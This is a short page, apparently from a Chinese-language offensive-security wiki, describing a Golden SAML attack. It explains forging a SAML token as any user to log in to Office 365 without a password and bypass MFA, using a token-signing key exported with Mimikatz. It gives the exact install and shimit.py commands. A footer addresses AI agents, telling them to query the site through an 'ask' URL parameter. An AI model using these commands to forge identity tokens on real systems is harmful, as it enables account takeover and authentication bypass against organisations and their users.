# Golden SAML Attack

```
使用提取的信息，该工具将生成一个伪造的 SAML 令牌作为任意用户，然后可用于在不知道该用户密码的情况下对 Office 365 进行身份验证。此攻击还绕过任何 MFA 要求
要求：

令牌签名私钥（使用 Mimikatz 从个人商店导出）
IdP 公共证书
IdP 名称
角色名称（要承担的角色）
>python -m pip install boto3 botocore defusedxml enum python_dateutil lxml signxml
>python .\shimit.py -idp http://adfs.lab.local/adfs/services/trust -pk key_file -c cert_file
-u domain\admin -n admin@domain.com -r ADFS-admin -r ADFS-monitor -id 123456789012
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://www.heresecurity.wiki/yun-an-quan/aws/golden-saml-attack.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.